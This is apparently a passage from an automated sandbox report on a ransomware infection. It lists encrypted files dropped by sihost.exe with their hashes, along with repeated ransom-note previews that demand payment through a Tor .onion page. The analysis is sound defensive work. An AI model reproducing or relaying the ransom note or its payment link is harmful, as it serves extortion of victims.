                                                                                                SHA-512:E1F9FAF72C4CCCEB8869002698491EF608B7E0C4C420F6D93E154B4408D0FD2C4B9B750E0D55B47DB7050FAF18AE718961BD93E13B27397C29E6DF76E589AE6F
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\ZQIXMVQGAH.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:DOS executable (COM)
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.868631352738677
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:+6V9F+XTcZJmdrr7Dfln1ZjUH6NwQN6iKzRKxvuKy1Y7LHlI8Pv4H8IooB5V78um:dvF+XTJ1lXUJsEzRyvLy1ILi8Pi8ILzK
                                                                                                MD5:30669B9B52FB541E7ABDA666ADEE0246
                                                                                                SHA1:2EB757C2F0802865A55B731C0BF761EE2A152AFC
                                                                                                SHA-256:52D0E0B4CAFE700B20D23EB70C7A275691C002A31BF6C3A7D59F8581B7DA531A
                                                                                                SHA-512:6F5B52C230BEC8965CBC71987128DE79DA60F05E4714171A2F1B485710EB523F14B727A5AB10CB231BB7F589E43ED116C8CCA78B9B3FBDDE048CCB1B2D1ED3C8
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\ZQIXMVQGAH.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.825549119520685
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:36r7XnWyJW7x7tT6PGGfQVk6MSCEfwxIAuulEn8wXJEDBUCOEQ9VD:36PWsoeJSCEfwxI8Sn7EROECVD
                                                                                                MD5:9EA96ED094843D7E8F7E2C18F4B7F686
                                                                                                SHA1:77536AA2D1ACCCD834C8F6F760E4F07AA793EAC4
                                                                                                SHA-256:53677E825D937C0E636D86923F527FA27328E5B4829DAC58AB11B8D5E3D9F81C
                                                                                                SHA-512:1C507BA1C55B8DBF0E0BB1117A3031DE34C674C84C3602A7F6A4C3CDAA9AE1E55D2DC659FFEFBBFF3500A30FBBD1D4B29BAEF14D6354A72A9BAE70EC2FBC7B9B
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\BJZFPPWAPT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8556839955969044
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:K2m+VC9XM6eKBztK6qEfzHGOhFbHbS0M9duHEKvsZ1QzY8MdnCCIDUeko0EHXrGc:K2m+V1JKV1GObI9kEJZmzkCCyUm3X
                                                                                                MD5:D174D5E0D74218DE24659DBCC0D0FC94
                                                                                                SHA1:433DDDC32C39A4F181F5B92AEE401565DC5FA945
                                                                                                SHA-256:45110D6827E4B9E463A421F88A64E70F70A6CD54A61230022E1064612D47E5DA
                                                                                                SHA-512:EB9212E704BE34028DF4AC42BFA99525250D287043012053F6F20A5C330A9E598EEAF8D2E3608C3895B8A547581A734E752F72FB71FFA7393A8816338644940D
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\EEGWXUHVUG.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.867986420207379
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:OL0ntqS9h/WxMVLFL4zy5SuVr8+QdNrcDlQlilxCS5BROpI4IOZt2atXVgn/cX5S:e0ntqaWxMVLF9r8/XAZzNfspIOt2atXa
                                                                                                MD5:7E86ED77283BCA793181F7A656F25F52
                                                                                                SHA1:45BD9F4534BD518AABE6B43F9C6EA779823AA3FA
                                                                                                SHA-256:08CB1FAFCAED8F65F9924F66D36368A3835B858E3D025EFA9C573B1395225DD7
                                                                                                SHA-512:45550C04C721DDA724A6DA78A85DF3ACFB9534F4E671A19327CE7E1EA5A5DD24C19C7B41AD8E4A61598B26693698031791850FC15AF90F730AA362F6B4470B82
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.847831639575832
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:aLi7DziUNwTyLB8y/5MCLRzQDSt9C/x/KZxuu1lIBHzt0sRBtfvmmL1lHBeW3Q0A:1DuUNYg8y/53JQcYdy1lI1t3RBxv51lu
                                                                                                MD5:81AA624A0CCA97A07C8AEDDADE45508C
                                                                                                SHA1:C7E40DBB3095562CECC5A760C4C2B2ACEAD518F6
                                                                                                SHA-256:2764F3DEC366BD99F029395D679693D42A9CD0402AEE1D6E570F4C3FBB8108B5
                                                                                                SHA-512:077BFC2FFCB47ABDD9D37DA47D558A3C40CDA357DE6F9CB7B2D137A7EFA4DAF242A5C5A1C69BFCAB9BDF796C5AB74AF45CC5F3099E9EA176824E30EA686EE053
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.848125285511834
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:vgL8IEX1J7dfL8Z2rTBkW5d44qscDW+LwEy2/9TSRvLzaGd1Qqk85iJ2x/i86:fj7dzjrNkci43OlsEyWNSRqGdB5//i86
                                                                                                MD5:B172F08CA0705D9A14EB3C41E376385B
                                                                                                SHA1:428B209D8A2DEAD17044B0C1B69AA27BF9904CC4
                                                                                                SHA-256:F84992591828D460B8FA81756F790AA759AAD96BF2CB7E28898A83C8A6DD2479
                                                                                                SHA-512:D2E9D6FBAF87835665EFA9EFFA7AA692C6EE58E75C39B6233B7E2855CA0DCAAAA1D208B39D81FAF756FB461FF89B33B8808398579A1C596318EB15CC948D39B6
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.862925502240095
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kttDEWmYA9kkMATJMEq9M+qQlwh+4TwRVhNw/0C+lot806Z:arA9vpTJrqFDlQ+4ob+6lot8z
                                                                                                MD5:9E492972574D4B32DB709492BD0A6CD8
                                                                                                SHA1:E33B7CB2ADA7751FD0328D1BA5CF031FB698C8C3
                                                                                                SHA-256:6AD36234BB0CAF8060DEA68ED889F6DA00D0F19EF95F451B0C73C2AD14C703A9
                                                                                                SHA-512:3EC602619243C1F0DBEF836B8339D65D2C94E727F905255F9AA7FEE12D08712CE7EE88E3A2845248AA6033E9A13618764D2628EF65D0F92683D935AF42D3D475
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\BJZFPPWAPT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.837997597923759
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Lm8J0FljnR1egNd7UQkE5nfeAcH6MukgCN52+OHZmL98lDj3r:X0PjniZDE0JHN4CjwI0DH
                                                                                                MD5:115EE7EF0DF538A73AB0917CE14BFF29
                                                                                                SHA1:18A504E16FEB096B108CE6F54465904FA07C6D0E
                                                                                                SHA-256:3E60A5C5DE2AD564F129D785929C3FEFBB19D0907E0218A90D5DA8C1250B87BE
                                                                                                SHA-512:07CD06BC0B00FE99484AAADB15B7E4B27495EA2CE29EAC8C36997D1D01D39256BC5F448856F2A56016DBF8DB3881528868BC6B018B76BBEAB74654919A930F38
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\EEGWXUHVUG.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.838597854294913
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:SjI/pi8isioynZRrEHD82/Am5JPoySpbjNlHnpmLhFnfs29gfu/R:kI/c8isv2UMm5JoxXbHQda2v/R
                                                                                                MD5:F6082FB3350BDF9BADD00E54312187BD
                                                                                                SHA1:6CB27A6F958BD5C76793080F915DAB53A72526F1
                                                                                                SHA-256:C5E0FB3E0E5E9FBC0212D73FC85110AC8D08B8554536D8EB163A1F00B965C466
                                                                                                SHA-512:07640C81EC21E03C514190D29A3BDBB7F826CB6004B93FE00BDA84C502ABB214B0F10537D97F796669EB9C051848B5DA4B8400BB53DC31114ED753B558A34739
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8577420888048595
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:KulCyIcSzPsXI+j541EAJ5BAwSZUKg2gX7dB+LyMH81TZfd6vI:VlCyBTX/wSZfg1X7qLH8hZfduI
                                                                                                MD5:991AF8C8FDE19616AD9BDCA0B7148308
                                                                                                SHA1:9C1E410756752B4D3D055923AF9063B5A28774FA
                                                                                                SHA-256:B965B6225F5EC8F9E8753E234C4CA8C9F491A257A01A206E3D7C0DD7A172A49A
                                                                                                SHA-512:7F683E45523EFAA80093579FEF5BE2A58BE51B624BD93554DB9522E4CFCEE4FDAD1596CC88A594D05A3E4E540C8816C5C6C872211A8BD7C6F8B1DCBCF9E15FF8
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.855349656624837
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ec+dAzS4bQzmVegh2G2XsZAwjHKu5yPscirU3xCVaKG0XfVoDFSRNo:eIzS4E8/2PyIde6xQtvVGFSro
                                                                                                MD5:C2270450C8C2C9CFF866C457D047D015
                                                                                                SHA1:02557E1963C07A0E67A092C599A024A653B6B12F
                                                                                                SHA-256:32F53747361166DBED6381E4D123D39555073ACD9BCAEA981CB972EF10E84D21
                                                                                                SHA-512:FAEA9413862A322392763C48AB439E92D2558BEEAF500E51FD051C99292D8840FE569E92306E3C5362941A6570F7616AB488621B40B8267F6D65CCC156078F38
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\ZGGKNSUKOP.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.838864271228105
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WkD4C0ZQ/bcxTTZ0mMPNM4ZMMkwZs3TAiRoNnpoiqlx2wHQWsS/xK/Y6:dD10ZaoxT+xMg5K3TAOEpXq6wHDjKB
                                                                                                MD5:29666BA84127F76B6151A1DA02C61F8D
                                                                                                SHA1:DE207E28016C1C04EF56423F0E8C66540C7F768A
                                                                                                SHA-256:2E35EA77F64164860F6FC01A89C923B7E088DF07FEF20BA7E1E35840349BEFBC
                                                                                                SHA-512:267A2307A51F39C3C646FA9124593E40F3C4D7C4785A0200142AAF98EB3F155CF471C6ABC9646FC0C94458C4409EB77605531E259FCF156DFD7FBAB5A2B6B972
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.849104880170825
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:/3HeeNeOQQzfoyCr9Vsgb4QOrRDjknium6mMNNi1IgSV3lInTVE1bvnp2Xq:veGeTS3C7sgXmlYoNANWSn17pCq
                                                                                                MD5:84EE142367D1937B82CDE97EACC1CDFE
                                                                                                SHA1:4195DE4FAF9FE70431F7F6FA2E001DDDE4E5493A
                                                                                                SHA-256:0C5CE2F5AE7CD59764FFCB185704C693802C20853F14C9C9B11FB5A0FFF80620
                                                                                                SHA-512:3CF4F87EB47AE0405EDBBE552BB12E511F83447DF9641721F0C1095721A638E9BCD2BD422298E15FF40D95817340F9A7BD1CBAB679BB795B93525198F4080502
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\IPKGELNTQY\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.83801119096127
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JfF4FuGyKM32Z6dClRR8wJTUKvcAj7ILuMJvXeWcbgEDUWjrY4:JIuGDMGXR2dJveWcsEDUQ
                                                                                                MD5:E1A39535229201C1A4D1A16A057516A4
                                                                                                SHA1:FAE34EA8D53649CB6E09905F17E1D044654514CA
                                                                                                SHA-256:C712814117571CB382D10B55F5D34DF380FD7FD5DBE9DCCF8C6993D3925516E2
                                                                                                SHA-512:D11118282C43C823C51087888A4C9FC24A1925F57FEA0665C7C062846C31DDD06903277A0626CECE07C2A09A25C9B44A6515E243189A54DD6AEA0FF0BB579B14
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\IPKGELNTQY\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8449275105429175
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:I/c4zq7mFP630hxA8MU2Hec/MSDoabThqjBaykivMqBG07TaxlE:I/LO7mt6320THecdDNtapEl1xu
                                                                                                MD5:8A5457553DBE4488146D72C29712DB0B
                                                                                                SHA1:7D4E83B375E48FF141C0AE12A0F133380E5964D0
                                                                                                SHA-256:C830828BE98E351B8DB97545F877552823BA539861F9899534266C5530F5FE10
                                                                                                SHA-512:88B3E7F11076A56E2BC6C2D1603D086E282ADE75EE9AEDDC75F07792E00EAEE608320201FA5C14285EC25231C4EC82490E1F3B31683EDA7A58437FA50947AB0B
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\IPKGELNTQY\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.854672341016941
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XF3CH18i9ViLuwjk0UTz88SSFdn6X/0KVG4b1Znrud1e5rCoCc:Xl8iLuUk0U388SSTn6X/0IG4b1prS1eL
                                                                                                MD5:6A30EF6CAE26A9662AE50C4643E4682F
                                                                                                SHA1:A17DBD41AF2F7D6A7975D883D3C28F4AA8299CF9
                                                                                                SHA-256:BBC4AAF36D84A5D46C42DFE7C94F1B9C78227938506C4474503D4D5F2492D35A
                                                                                                SHA-512:DD68896CEC0E328C0A6541BC0776A86226C5854E408E8FAAC4F8734FC61C0040496A503009B6AEFC83E4778A38CDC5BBAC42D59C57533F3071A60A432C2A61B5
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\IPKGELNTQY\NEBFQQYWPS.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:PGP\011Secret Key -
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.87328620159484
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:e/vDLGlDuzb4FY94OXSjqzEvM0T+C8meJDnJUCbNUoBdb3WbbKHr33kGoTEC/V1:ttDYeiS+EPTT8mwnJFB5mK38TP/r
                                                                                                MD5:DBC6736D670F83F948978146B2E160FD
                                                                                                SHA1:7041CCA8E03F7072755EBC38274244BE5398502F
                                                                                                SHA-256:EC51B492735BE32809647EA0EE7E3639C9130543E2BB70DE8215A311A4BAC040
                                                                                                SHA-512:9BE9F92E22F421D884D40E09741FED4300A2F1D201DF981DBB5FA180B3835BD4B189D6357650803DE2498BB44D217761B9EC6EABCD47FF0FCD7052CD2D758002
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\IPKGELNTQY\ZQIXMVQGAH.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.857422952373003
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:KUqFQURZAqbOIBTW092ddJvTpV2IlM36N19AN5xYFpUvGsFY7GfMKCVQQ:Kfx/XbOfjddJvVcgT19ANLvr4GfMKCVN
                                                                                                MD5:50DBBB30E3A6CCCEB636FB7323530AE0
                                                                                                SHA1:1C28DE9ACABD851AF3D260C846AB3125CACA0E83
                                                                                                SHA-256:CAD82E01BF5F5C933DAD0068ADF267B7E0375758D48682642198D41BCD6D5A53
                                                                                                SHA-512:71BE186980C5F7660C5017D2710F29FE15F384C41844AA40E2FBF8377DEE92BDA0F00674C07C954AE9E4ED21D80C1DDF79B1CAF86B33C0983461E483ED521A82
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\IPKGELNTQY\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.854308235657795
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:5F1go8QgB2jbdRakvJJg8Jfz8ae1nNt5BuF/7rAzui5vfvUv1MttIfC5X7LZAc2:5t8Qg6vJ6Yfz8ae1NzBu9EBvKMzrj2
                                                                                                MD5:0CC7541588153BC7060E98CDF4D58825
                                                                                                SHA1:D2CBC5A518310BEC4C9101DC06E75AE5F143CBA3
                                                                                                SHA-256:51B624F322A5B831751E08339252CD2B0E70196D580B2E3372DE7367C562E6D7
                                                                                                SHA-512:92CBDF418277629AF529976321664312A006F753FC0455ECE0514BA2C47598098DED01C8092DFCEC3F4FB66CB4A998E12F076A38FF0D730D4589343AFB258BF7
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.865632064719489
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qA3MfNkf+waDkNkiUQ2mh0r3XVwF3Rh93dEuJu4xTiq/q36SxkJS4Cq6VXnlBX:H3M7wrk97XVwF3RhjEexTiq/q36SxkJ+
                                                                                                MD5:CB38AAA30AC04E852F3ECF452B30DAFA
                                                                                                SHA1:FFE30DA16D6EABE292F153264C0165FF5D25C5D3
                                                                                                SHA-256:6274A629AE9BDEA38E10955C72717720BFEC222790EF6103C1732A571A1D8605
                                                                                                SHA-512:A2795FBD8A6BBE5B8356CB59C8A4BC51543EBFBCEB06F2A6A0C4903E3347D77898CE26DB3AF494114DA09D35BD0CF16EDC11C58BCCB6F8C63646F66930AC7E20
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.84353416729329
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7iOT1tWE0nsSdH+5w0NUD0kg8FUJM8jX17/owwBlQLP1Kr6J6IGs9jJoj:WOTzWXNHs00kbQMAdoRKO6J6wlJs
                                                                                                MD5:7A96B3D71CC512798133FBF728EDD70A
                                                                                                SHA1:A4F3757595F5DCBEBD4D98587AB5EA7932995A7F
                                                                                                SHA-256:3A564861EF10BDB49625412267CB21A4A6E19BDF73EFF8BEC14CB611016281B2
                                                                                                SHA-512:5B1403D4740427F8A9B1AE40F49C3DDE3CB6DAB4079134E2FD2D4BCB91CF52E06DCA9CF0253AA64DE227F77941BF342A13A0973DDCDDA5077CE14CAF108210D3
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.852486498732989
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:1tN2IssPgs9njRs65MWxwA8WjE9DMdtC5Qfp8hExKCsOy4tuzJ:1tN2Ijoszs6Xn81MdwKp8Cad0u1
                                                                                                MD5:73593ACD06CE4557E4CAF699A261455E
                                                                                                SHA1:C97E82C964E75D78ECA9AEC9A8085F2C1A768C1E
                                                                                                SHA-256:FABAD5AB3A4FE029C06C1F727323FDDC726F8B8D3273585790301A770A894092
                                                                                                SHA-512:7B95A68ED04E963D860DA13F8DB17A8B569F27548A42AC117F817D3C7B86B4F1FF06E7284591B092A768BD3F831FCEC4169C32258639530580A85130A74FAC10
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\QNCYCDFIJJ.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.84028003152683
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:UJZhUPlHedrZ7kIe2WuljxmDZUSH6okw6dsV3Y2PrMa1ykJP7HMTgRhEYy:qZo8rkIe/u6VUbHmVI2JEkd7HMTgR2D
                                                                                                MD5:DAB90FFB32CC56C44B9DF82EABD7B5C0
                                                                                                SHA1:E3E6242865FD141D64EAC8F77C755565050C0C25
                                                                                                SHA-256:AFCA9BB6FBB8119AB34C47C65677D5E074A9584546DFD26B6C496CC9A7758CA0
                                                                                                SHA-512:92E653D87EC9EFD658DFD3CBB05B38499DBC97CD4C1912DE7CB65F7427081CF1515CEBCDDF017E710C57A81C2844232237BF1D8D2C11638D0AA8AC8C10B8CA5F
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\SQSJKEBWDT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.858606899605877
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:nDF6+FyqUasyk6p5ROWg1vALHkDVNH7HlortaXF3i0XiKw:nDjuasybYILHkfDyrtqFS0XiKw
                                                                                                MD5:F499B3C27BFD38CCA2097523F0A0B9F2
                                                                                                SHA1:CA3FE9E0DD80ECB850229BC19D59144A7071DF97
                                                                                                SHA-256:C248655E9A8DDEBC560DF721297B7CA7E7057407DBF27BD6923BD8D1BAECD179
                                                                                                SHA-512:A294DD4A89F7FEE69203B0B0FE694ED06E7A433C01D61A090C831C6F03E4BC081FD85FE7A20C41433CDD7B2978F595B00FC8B022897851887C22DBAD0578DB75
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\SUAVTZKNFL.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.836749634799338
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:iq0FCl11DJPYo+8Lx5johlf4lBCWOMSJlBGbJFhwLSrODn+4volRi7cZnS:QU7FJgo+8l56lfE8LMSIbJFhwGrpzVS
                                                                                                MD5:CC34864CA37FF6468952761D148B97A5
                                                                                                SHA1:62D24C618851F31B8652958880CCD49043A8EFEC
                                                                                                SHA-256:2BBB5A8477E341061506FAFE28B232D28AD8C9D93FBFFD1E1AB5BF89E7605663
                                                                                                SHA-512:DE4F0D9D01FBCB8EB5350197D095BC01A1DA7DC209BD9AE60DD04D4248F906A5A0F43596B4EE56594F90BDD1B8E65D8AD7B5B7B664EFB2F92E4D6FD05C8E0881
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
